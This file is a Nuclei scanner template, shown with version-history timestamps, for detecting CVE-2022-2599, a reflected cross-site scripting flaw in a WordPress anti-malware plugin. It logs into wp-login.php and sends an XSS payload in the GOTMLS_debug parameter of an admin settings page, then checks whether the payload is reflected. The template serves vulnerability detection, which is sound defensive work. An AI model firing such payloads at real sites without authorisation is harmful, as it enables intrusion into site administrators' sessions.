nuclei-templates/http/cves/2022/CVE-2022-2599.yaml

56 lines
1.8 KiB
YAML
Raw Normal View History

2023-02-23 09:02:08 +00:00
id: CVE-2022-2599
info:
name: WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting
2023-02-23 09:02:08 +00:00
author: ritikchaddha
severity: medium
description: |
WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.
2023-02-23 09:02:08 +00:00
reference:
- https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef
- https://wordpress.org/plugins/gotmls/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2599
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-02-23 09:02:08 +00:00
cve-id: CVE-2022-2599
cwe-id: CWE-79
cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:*:*:*
epss-score: 0.00064
2023-02-23 09:02:08 +00:00
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
tags: wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,cve,cve2022
2023-02-23 09:02:08 +00:00
http:
2023-02-23 09:02:08 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1
Host: {{Hostname}}
2023-02-23 11:39:33 +00:00
2023-02-23 09:02:08 +00:00
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><img src onerror=alert(document.domain)>"
- "GOTMLS_mt"
condition: and
2023-02-23 11:39:33 +00:00
2023-02-23 09:02:08 +00:00
- type: word
part: header
words:
- text/html
2023-02-23 11:39:33 +00:00
2023-02-23 09:02:08 +00:00
- type: status
status:
- 200